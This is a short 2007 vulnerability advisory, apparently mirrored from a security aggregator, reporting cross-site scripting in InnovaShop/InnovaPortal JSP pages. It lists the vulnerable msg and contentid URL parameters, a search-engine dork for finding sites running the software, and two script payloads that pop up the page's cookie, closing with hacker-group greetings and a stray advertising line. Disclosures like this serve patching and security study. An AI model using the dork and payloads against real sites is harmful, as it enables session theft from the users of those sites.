Lucene search
SecurityvulnsSECURITYVULNS:DOC:18204HistoryOct 16, 2007 - 12:00 a.m.
InnovaShop™® (mgs.jps) Cross Siting Scripting
2007-10-1600:00:00
vulners.com
9
InnovaShop™® (mgs.jps) Cross Siting Scripting
Download:
http://www.innovaage.com/
http://www.innovaportal.com/
Bug found by JosS / Jose Luis Góngora Fernández
Contact: sys-project[at]hotmail.com
Spanish Hackers Team
www.spanish-hackers.com
/server irc.freenode.net /join #fullsecure
d0rk: "Site developed by InnovaAge™®" / "Powered by InnovaPortal©"
Stop lammer
Exploit In (XSS):
http://www.server/path/msg.jsp?msg=[XSS]
http://www.server/path/tc/contents/home001.jsp?contentid=[XSS]
http://www.server/innovashop/msg.jsp?msg=[XSS]
http://www.server/innovashop/tc/contents/home001.jsp?contentid=[XSS]
…all…
Cross Siting Scripting (Code):
<script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>
Admin Login:
//---------------------------------------\\
Greetz To: All Hackers
JosS! / Jose Luis Góngora Fernández
Grandes éxitos, superhéroes, imitaciones, cine y TV…
http://es.msn.kiwee.com/ Lo mejor para tu móvil.